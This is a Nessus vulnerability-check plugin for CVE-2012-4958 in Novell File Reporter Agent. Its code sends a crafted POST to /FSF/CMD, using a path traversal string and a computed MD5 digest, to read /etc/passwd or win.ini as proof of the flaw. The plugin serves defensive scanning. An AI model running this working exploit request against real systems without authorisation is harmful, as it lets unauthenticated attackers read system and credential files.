Novell File Reporter Agent FSFUI UICMD 126 Arbitrary File Download

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(62977);
  script_version("1.9");
  script_cvs_date("Date: 2018/11/15 20:50:23");

  script_cve_id("CVE-2012-4958");
  script_bugtraq_id(56579);
  script_xref(name:"CERT", value:"273371");

  script_name(english:"Novell File Reporter Agent FSFUI UICMD 126 Arbitrary File Download");
  script_summary(english:"Tries to download a file");

  script_set_attribute(
    attribute:"synopsis",
    value:
"An application running on the remote host has an arbitrary file
download vulnerability."
  );
  script_set_attribute(
    attribute:"description",
    value:
"The version of Novell File Reporter Agent running on the remote host
has an arbitrary file download vulnerability.  Making a specially
crafted POST request to /FSF/CMD for records with a name of FSFUI and
UICMD of 126 could result in arbitrary files being downloaded.  A
remote, unauthenticated attacker could exploit this to download
arbitrary files as root (against Linux targets) or SYSTEM (against
Windows targets). 

This version of Novell File Reporter Agent likely has other
vulnerabilities, but Nessus has not checked for those issues."
  );
  # https://blog.rapid7.com/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959/
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?2d6b6622");
  script_set_attribute(attribute:"solution", value:"There is no known solution at this time.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:U/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'NFR Agent FSFUI Record File Upload RCE');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2012/11/16");
  script_set_attribute(attribute:"plugin_publication_date", value:"2012/11/20");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:novell:file_reporter");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Misc.");

  script_copyright(english:"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("novell_file_reporter_agent_detect.nbin", "os_fingerprint.nasl");
  script_require_ports("Services/nfr-agent", 3037);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("data_protection.inc");

port = get_service(svc:'nfr-agent', default:3037, exit_on_fail:TRUE);

if (report_paranoia < 2 && (os = get_kb_item('Host/OS')))
{
  if ('Windows' >< os)
  {
    checks["\windows\win.ini"] = '; for 16-bit app support';
    checks["\winnt\win.ini"] = '; for 16-bit app support';
  }
  else
  {
    checks["/etc/passwd"] = 'root:.*:0:[01]:';
  }
}
else
{
    checks["\windows\win.ini"] = '; for 16-bit app support';
    checks["\winnt\win.ini"] = '; for 16-bit app support';
    checks["/etc/passwd"] = 'root:.*:0:[01]:';
}

foreach file (keys(checks))
{
  pattern = checks[file];
  if ('/etc/passwd' >< file)
    traversal = '../../../../../../../../..';
  else
    traversal = '..\\..\\..\\..\\..\\..\\..\\..\\..';

  record =
    '<RECORD>' +
    '<NAME>FSFUI</NAME>' +
    '<UICMD>126</UICMD>' +
    '<FILE>' + traversal + file + '</FILE>' +
    '</RECORD>';
  digest = toupper(hexstr(MD5('SRS' + record + 'SERVER')));
  req = digest + record;
  res = http_send_recv3(
    port:port,
    method:'POST',
    item:'/FSF/CMD',
    data:req,
    content_type:'text/xml',
    exit_on_fail:TRUE
  );

  if (res[2] =~ pattern)
  {
    res[2] = data_protection::redact_etc_passwd(output:res[2]);
    if (report_verbosity > 0)
    {
      # extract the file contents from the XML response
      contents = strstr(res[2], '![CDATA[');
      trailer = strstr(contents, ']]>');
      contents = contents - '![CDATA[' - trailer;

      report =
        '\nNessus retrieved ' + file + ' by making the following request :\n\n' +
        http_last_sent_request() +
        '\n\nWhich returned the following data :\n\n' +
        contents;
      security_hole(port:port, extra:report);
    }
    else security_hole(port);

    exit(0);
    # never reached
  }
}

# this code is only hit if none of the exploit attempts worked
audit(AUDIT_LISTEN_NOT_VULN, 'Novell File Reporter Agent', port);